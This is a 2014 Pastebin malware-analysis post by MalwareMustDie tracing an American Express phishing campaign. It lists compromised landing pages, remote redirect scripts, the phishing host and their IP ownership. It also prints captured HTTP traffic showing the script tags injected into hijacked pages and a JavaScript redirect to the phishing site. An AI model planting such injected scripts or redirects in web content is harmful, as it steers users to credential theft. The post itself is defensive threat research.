daily pastebin goal
58%
SHARE
TWEET

American Express Phishing April 12 2014

MalwareMustDie Apr 12th, 2014 626 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // #MalwareMustDie! $ date
  2. // Sat Apr 12 13:28:40 JST 2014
  3. // Case: American Express Phishing April 12 2014
  4. // Analysis base: http://blog.malwaremustdie.org/2014/02/one-upn-time-with-american-express.html
  5.  
  6. //Landings:
  7.  
  8. http://floresdellago.com/fresher/caring.html                    184.107.209.210
  9. http://www.inversionesdecolombia.co/hellishly/flotilla.html     184.107.209.210
  10. http://www.ffgpartners.com/errol/turks.html                     209.90.108.164
  11. http://bravestnightofcomedy.com/larches/auctioning.html         207.45.187.98
  12. http://ftp.autolens.co.uk/kicky/barclay.html                    91.186.25.139
  13. http://web-fx.net/busbies/continuums.html                       91.186.1.166
  14. http://fieldingscarpets.co.uk/shebang/reprobate.html            91.186.1.166
  15. http://steinschatz.de/refusal/prayers.html                      94.101.38.24
  16. http://dos-pistolas.24.co.at/outflanks/grafton.html             46.4.149.201
  17. http://economysquareshoppingcenter.com/taxis/reimposed.html     74.220.207.133
  18. http://safetyworxgroup.co.za/environs/produce.html              196.22.172.216
  19. http://pointcanada.com/lakshmi/specter.html                     184.107.232.2
  20.  
  21. // Remote Scripts:
  22.  
  23. http://bvh.cwsurf.de/slogan/transplant.js                       85.195.104.20
  24. http://debbixler.com/pulley/lifeguard.js                        72.167.186.171
  25. http://electricwinches.co.uk/lofting/retiring.js                91.186.1.215
  26. http://mcnabconstruction.com/morton/cetaceans.js                91.186.1.166
  27.  
  28. // Phishing site:
  29.  
  30. http://218.234.108.131:8080/americanexpress/                    218.234.108.131
  31.  
  32. // IP complete transtation (Reverse|ISP|Location)
  33.  
  34. 184.107.209.210|globalrotor.com.|32613 | 184.107.0.0/16 | IWEB-AS | CA | HOSTINGYSOLUCIONES.COM | JULIAN MESA
  35. 209.90.108.164|for918-128.pricessolanum.com.|5048 | 209.90.64.0/18 | FIBER | US | NETHOSTING.COM | LINKS WEST
  36. 207.45.187.98|ice.securenet-server.net.|22878 | 207.45.176.0/20 | ASACENET1 | US | ACENET-INC.NET | ACENET INC.
  37. 91.186.25.139||29550 | 91.186.0.0/19 | SIMPLYTRANSIT | GB | EUROCONNEX.NET | SIMPLY TRANSIT LTD
  38. 91.186.1.166||29550 | 91.186.0.0/19 | SIMPLYTRANSIT | GB | EUROCONNEX.NET | SIMPLY TRANSIT LTD
  39. 94.101.38.24|eight.rr1.revido.de.|16097 | 94.101.32.0/20 | HLKOMM | DE | REVIDO.DE | REVIDO LIMITED
  40. 46.4.149.201|static.201.149.4.46.clients.your-server.de.|24940 | 46.4.0.0/16 | HETZNER | DE | YOUR-SERVER.DE | QE GMBH & CO. KG
  41. 74.220.207.133|host133.hostmonster.com.|46606 | 74.220.192.0/19 | UNIFIEDLAYER-AS-1 | US | UNIFIEDLAYER.COM | UNIFIED LAYER
  42. 196.22.172.216|www.swh-02.mweb.net.|10474 | 196.22.172.0/24 | MWEB | ZA | MWEB.CO.ZA | MWEB CONNECT (PROPRIETARY) LIMITED
  43. 184.107.232.2|prolink.elighthost.com.|32613 | 184.107.0.0/16 | IWEB-AS | CA | - | ALIREZA YARMOHAMADI
  44. 85.195.104.20|u01.cwsurf.de.|29066 | 85.195.64.0/18 | VELIANET | DE | VELIA.NET | VELIA.NET INTERNETDIENSTE GMBH
  45. 72.167.186.171|ip-72-167-186-171.ip.secureserver.net.|26496 | 72.167.184.0/22 | AS-26496-GO-DADDY-CO | US | GODADDY.COM | GODADDY.COM LLC
  46. 91.186.1.215||29550 | 91.186.0.0/19 | SIMPLYTRANSIT | GB | EUROCONNEX.NET | SIMPLY TRANSIT LTD
  47. 91.186.1.166||29550 | 91.186.0.0/19 | SIMPLYTRANSIT | GB | EUROCONNEX.NET | SIMPLY TRANSIT LTD
  48. 218.234.108.131|smf.taratps.com.|9318 | 218.234.0.0/15 | HANARO | KR | TARATPS.COM | TARA TPS
  49.  
  50.  
  51. // The Landing  PoC
  52.  
  53. GET /hellishly/flotilla.html HTTP/1.1
  54. Host: www.inversionesdecolombia.co
  55. Referer: http://MalwareMustDieHatesPhishing.org
  56.   :
  57. HTTP/1.1 200 OK
  58. Date: Sat, 12 Apr 2014 04:17:12 GMT
  59. Server: Apache/2.4.6 (Unix) OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
  60. Last-Modified: Fri, 11 Apr 2014 15:15:26 GMT
  61. Accept-Ranges: bytes
  62. Content-Length: 532
  63. Connection: close
  64. Content-Type: text/html
  65. 200 OK
  66. Length: 532 [text/html]
  67. Saving to: './sample.mmd'
  68.  
  69. // The Remote Script PoC
  70.  
  71. $ cat sample.mmd
  72. <html>
  73. <table width="275" border="1" cellpadding="3" bordercolor="#0000FF"><tr><td><div align="center">Connecting to server...</div></td></tr></table></a>
  74. <script type="text/javascript" src="http://bvh.cwsurf.de/slogan/transplant.js"></script>
  75. <script type="text/javascript" src="http://debbixler.com/pulley/lifeguard.js"></script>
  76. <script type="text/javascript" src="http://electricwinches.co.uk/lofting/retiring.js"></script>
  77. <script type="text/javascript" src="http://mcnabconstruction.com/morton/cetaceans.js"></script>
  78.  
  79. </html>
  80.  
  81. // The Script Redirector PoC
  82.  
  83. Resolving bvh.cwsurf.de (bvh.cwsurf.de)... 85.195.104.20
  84. Caching bvh.cwsurf.de => 85.195.104.20
  85. Connecting to bvh.cwsurf.de (bvh.cwsurf.de)|85.195.104.20|:80... connected.
  86. GET /slogan/transplant.js HTTP/1.1
  87. Referer: http://pointcanada.com/lakshmi/specter.html
  88. Host: bvh.cwsurf.de
  89.  :
  90. HTTP/1.1 200 OK
  91. Date: Sat, 12 Apr 2014 04:14:29 GMT
  92. Server: Apache
  93. Last-Modified: Fri, 11 Apr 2014 22:59:02 GMT
  94. ETag: "90c011c-41-4f6cc479c1af1"
  95. Accept-Ranges: bytes
  96. Content-Length: 65
  97. Connection: close
  98. Content-Type: application/javascript
  99. 200 OK
  100. Length: 65 [application/javascript]
  101. Saving to: './sample.mmd'
  102.  
  103. $ cat sample.mmd
  104. document.location='http://218.234.108.131:8080/americanexpress/';
  105.  
  106. // The rest of the information are similar to the posted blog.
  107.  
  108. ---
  109. #MalwareMUSTDie!
  110. Analysis:  @unixfreaxjp
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top